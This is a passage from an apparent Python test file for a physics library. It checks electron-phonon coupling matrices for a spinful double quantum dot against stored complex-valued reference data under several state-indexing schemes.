'charge': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
'sz': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
'ssq': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]]}
p = ParametersDoubleDotSpinfulElPh()
for indexing in ['Lin', 'charge', 'sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
baths = PhononBaths(p.nbaths, {}, si, {}, {}, {})
Vbbp = elph_construct_Vbbp(baths, p.velph)
assert norm(Vbbp - data[indexing]) < EPS
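# Rotating the coupling matrix into the many-body eigenbasis with
# elph_rotate_Vbbp must match the stored reference values for each indexing.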
def test_rotate_Vbbp():
data = {'Lin': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 1.5-1.0j, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.8944271909999155j, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0], [0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.8506508083520395, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8506508083520395, 0.0, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 4.5+1.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.5-2.0j, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191335, 0.0, 1.788854381999831j, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0], [0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.8506508083520394, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8506508083520391, 0.0, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 10.5+2.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'charge': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 0.0, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, 0.0, 0.0, -0.5257311121191336, 0.8944271909999155j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 3.0, 0.8506508083520395, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.0, 0.0, 0.8506508083520395, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, 0.0, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 0.0, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, 0.0, 0.0, -0.5257311121191335, 1.788854381999831j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 7.0, 0.8506508083520394, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.0, 0.0, 0.8506508083520391, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, 0.0, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'sz': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, -0.5257311121191336, 0.8944271909999155j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 3.0, 0.8506508083520395, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.8506508083520395, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, -0.5257311121191335, 1.788854381999831j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 7.0, 0.8506508083520394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.8506508083520391, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'ssq': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, -0.5257311121191329, 0.8944271909999164j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191329, 3.0, 0.8506508083520398, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999163j, 0.8506508083520398, 3.0+1.7888543819998317j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6+0j]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 